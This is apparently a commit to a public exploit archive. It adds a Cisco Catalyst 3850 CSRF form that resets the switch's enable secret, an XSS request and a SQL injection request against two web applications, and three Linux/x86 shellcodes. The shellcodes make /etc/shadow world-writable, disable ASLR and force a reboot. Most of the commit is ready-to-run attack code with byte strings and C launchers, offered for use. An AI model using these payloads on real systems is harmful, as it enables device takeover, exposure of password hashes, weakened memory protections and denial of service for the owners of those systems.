DB: 2019-08-02

6 changes to exploits/shellcodes Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes) Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes) Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes) Linux/x86 - Force Reboot Shellcode (51 bytes)
2019-08-02 05:02:24 +00:00 · 2019-08-02 05:02:24 +00:00 · 2b7a0122f2
commit 2b7a0122f2
parent 50dee4d769
8 changed files with 386 additions and 1 deletions
--- a/exploits/hardware/webapps/47203.html
+++ b/exploits/hardware/webapps/47203.html
@ -0,0 +1,63 @@
+# Product : Catalyst 3850 Series Device Manager
+# Version : 3.6.10E
+# Date: 01.08.2019
+# Vendor Homepage: https://www.cisco.com
+# Exploit Author: Alperen Soydan
+# Description : The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to verify
+the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site.
+@special thx:Haki Bülent Sever
+# Tested On : Win10 & KaliLinux
+
+
+Change Switch Password CSRF @Catalyst 3850 Series Device Manager
+note : You must edit the values written by "place"
+___________________________________________________________
+
+<html>
+<body>
+<form
+action="http://IP/%24moreField%20%0A%24a%20%24b1%0A%24c1%0A%24c2%0Awrite%20memory%0A"
+method="POST">
+<input type="hidden" name="SNMP_STATUS" value="SNMP+agent+enabled%0D%0A" />
+<input type="hidden" name="send" value="nsback.htm" />
+<input type="hidden" name="SNMP_READCOMM_DEFVAL" value="ELVIS" />
+<input type="hidden" name="SNMP_CONTACT_DEFVAL" value="Network+Support+Group" />
+<input type="hidden" name="SNMP_LOCATION_DEFVAL" value="TEST2" />
+<input type="hidden" name="text_ipAddress0" value="place first octet" />
+<input type="hidden" name="text_ipAddress1" value="place second octet" />
+<input type="hidden" name="text_ipAddress2" value="place third octet" />
+<input type="hidden" name="text_ipAddress3" value="place fourth octet" />
+<input type="hidden" name="list_subnetMask" value="place subnet mask ip" />
+<input type="hidden" name="text_ipDefaultGateway0" value="place gw ip first octet" />
+<input type="hidden" name="text_ipDefaultGateway1" value="place gw ip second octet" />
+<input type="hidden" name="text_ipDefaultGateway2" value="place gw ip third octet" />
+<input type="hidden" name="text_ipDefaultGateway3" value="palce gw ip fourth octet" />
+<input type="hidden" name="text_enableSecret" value="KEY" />
+<input type="hidden" name="text_confirmEnableSecret" value="KEY" />
+<input type="hidden" name="text_sysName" value="SW_TEST" />
+<input type="hidden" name="list_date" value="19" />
+<input type="hidden" name="list_month" value="Jul" />
+<input type="hidden" name="list_year" value="2019" />
+<input type="hidden" name="list_hour" value="10" />
+<input type="hidden" name="list_minute" value="20" />
+<input type="hidden" name="list_period" value="AM" />
+<input type="hidden" name="list_timezone" value="C" />
+<input type="hidden" name="radio_telnetAccess" value="disable" />
+<input type="hidden" name="radio_snmpStatus" value="enable" />
+<input type="hidden" name="text_snmpReadComm" value="ELVIS" />
+<input type="hidden" name="text_sysContact" value="Network+Support+Group" />
+<input type="hidden" name="text_sysLocation" value="TEST2" />
+<input type="hidden" name="list_ipv6_interface" value="Vlan500" />
+<input type="hidden" name="list_prefix" value="64" />
+<input type="hidden" name="moreField" value="more flash:/html/more.txt" />
+<input type="hidden" name="a" value="cluster pref file e.cli" />
+<input type="hidden" name="z" value="cluster pref file append e.cli" />
+<input type="hidden" name="b1" value="!enable secret KEY!ip http authentication enable!end" />
+<input type="hidden" name="c1" value="copy e.cli running-config" />
+<input type="hidden" name="c2" value="delete /force e.cli" />
+<input type="submit" value="submit form" />
+</form>
+</body>
+</html>
--- a/exploits/multiple/webapps/47198.txt
+++ b/exploits/multiple/webapps/47198.txt
@ -0,0 +1,28 @@
+# Exploit Title:Web Studio Ultimate Loan Manager V2.0 - Persistent Cross Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: http://www.webstudio.co.zw/
+# Software Link: https://codecanyon.net/item/ultimate-loan-manager/19891884
+# Version: V2.0
+# Category: Webapps
+# Software Description : Ultimate Loan Manager is an online loam management system that allows lending businesses to manage their borrowers, loans, repayments, and collections with ease while being affordable at the same time.
+# CVE : CVE-2019-14427
+==================================================================
+
+#Description:XSS exists in WEB STUDIO Ultimate Loan Manager 2.0 by adding a branch under the Branches button that sets the notes parameter with crafted JavaScript code.
+
+
+
+POST /branch/store HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/branch/create
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+Cookie: XSRF-TOKEN=eyJpdiI6Imk3Y3llMlBkM0xOUHJNQ1NqYjg2dGc9PSIsInZhbHVlIjoiTmkxMlBlYnVTaHJYR0NZWWxNNEFrSE9PQ3UyUlA5OUg0eU1XUGoxWGR1UUJQbWk2KzRQVVhRTUhEMzBTWkVDMCIsIm1hYyI6Ijk0MGQxN2VhNGQzZDBhZjI4YTg4M2VkODE0NTVhNDFjNmM4MDEwM2U1NGQyOTM3N2FhZDZjMjdjNTUxYjE5ZDMifQ%3D%3D; laravel_session=U1GDgNLtFJQDdPa2jK8rb1vjWE6mkZ6XwrH0PxE7
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+_token=P31Y1Y1VoVj1yaN3lpSQfssubgRXYszMUpilyYSu&name=test&notes=%3cscript%3ealert(1)%3c%2fscript%3e
--- a/exploits/php/webapps/47199.txt
+++ b/exploits/php/webapps/47199.txt
@ -0,0 +1,21 @@
+# Exploit Title: WebIncorp ERP - SQL injection
+# Date: 1.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar
+# Version: Every version
+# CWE : CWE-89
+
+Vulnerable parameter: prod_id (product_detail.php)
+
+[GET Request]
+
+GET https://host/product_detail.php?prod_id=x' HTTP/1.1
+Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US
+Cache-Control: max-age=0
+Cookie: PHPSESSID=t57dv7rdsvut33jroled9v6435
+Host: host
+Referer: https://host/
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -41569,3 +41569,6 @@ id,file,description,date,author,type,platform,port
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,
 47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,
+47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,
+47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,
+47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -989,4 +989,7 @@ id,file,description,date,author,type,platform
 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
-47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
--- a/shellcodes/linux_x86/47200.c
+++ b/shellcodes/linux_x86/47200.c
@ -0,0 +1,87 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: chmod(“/etc/shadow”, 0666) and exit for Linux/x86 - Polymorphic 
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 53 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+	EXIT_CALL equ 1
+	CHMOD_CALL equ 15
+
+SECTION .text
+
+
+global _start
+
+
+ _start:
+     	nop
+	cdq
+	
+	push byte CHMOD_CALL
+	pop eax
+	
+
+	push edx
+	push byte 0x77
+	push word 0x6f64
+	
+	mov esi, 0x222933f0
+	add esi, 0x3f3f3f3f
+	push esi
+	xor esi, esi
+
+	mov esi, 0x243525f0
+	add esi, 0x3f3f3f3f
+	push esi
+	xor esi, esi
+
+	
+	mov ebx, esp
+	push word 0666Q
+	pop ecx
+	int 0x80
+
+	mov al, EXIT_CALL
+	int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66"
+"\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81"
+"\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe"
+"\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f"
+"\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6"
+"\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+#------------------------- usage --------------------------------------------------# 
+
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \ 
+
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+
+        int (*ret)() = (int(*)())code;
+
+        ret();
+
+}
--- a/shellcodes/linux_x86/47201.c
+++ b/shellcodes/linux_x86/47201.c
@ -0,0 +1,102 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: Linux x86 ASLR deactivation for Linux/x86 - Polymorphic 
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 107 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+        WRITE_SYSCALL equ 4
+
+        CLOSE_SYSCALL equ 6
+
+SECTION .text
+
+global _start
+
+
+
+_start: 
+        nop
+        mov eax, 0xffffffff
+        not eax
+        push eax
+        mov esi, 0x65636170
+        push esi
+        xor esi, esi
+        mov esi, 0x735f6176
+        push esi
+        xor esi, esi
+        push dword 0x5f657a69
+        push dword 0x6d6f646e
+        push dword 0x61722f6c
+        push dword 0x656e7265
+        push dword 0x6b2f7379
+        push dword 0x732f636f
+        
+        mov esi, 0x72702f2f
+        push esi
+        xor esi, esi
+
+
+        mov ebx,esp 
+        mov cx,0x2bc 
+        mov al,0x6
+        inc al
+        inc al
+        int 0x80
+        mov ebx,eax 
+        push eax 
+        mov dx,0xb01
+        add dx,0x2f2f 
+        push dx 
+        mov ecx,esp 
+        cdq 
+        inc edx
+        mov al,WRITE_SYSCALL 
+        int 0x80
+        mov al,CLOSE_SYSCALL
+        int 0x80 
+ 
+        mov al, 1
+        int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f"
+"\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72"
+"\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3"
+"\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2"
+"\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+
+#------------------------- usage --------------------------------------------------# 
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \ 
+
+
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+
+        int (*ret)() = (int(*)())code;
+
+        ret();
+
+}
--- a/shellcodes/linux_x86/47202.c
+++ b/shellcodes/linux_x86/47202.c
@ -0,0 +1,78 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: [NOT encoded] Linux/x86 Force Reboot shellcode for Linux/x86 - Polymorphic 
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 51 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+         SYSCALL_EXECVE equ 11
+
+SECTION .text
+
+global _start
+
+_start:
+        nop
+        or eax, 0xffffffff
+        not eax
+        push eax
+
+
+        mov eax, 0x8b90909d
+        not eax
+        push eax
+
+        mov eax, 0x9a8dd091
+        not eax
+        push eax
+
+        mov eax, 0x969d8cd0
+        not eax
+        push eax
+        
+        xor eax, eax
+        mov ebx, esp
+        push eax
+        push word  0x662d
+        mov  esi, esp
+        push eax
+        push esi
+        push ebx
+        mov  ecx, esp
+        or   al, SYSCALL_EXECVE
+        int  0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50"
+"\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0"
+"\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+
+
+
+#------------------------- usage --------------------------------------------------# 
+
+include <stdio.h>
+#include <string.h>
+ 
+char *shellcode = 
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}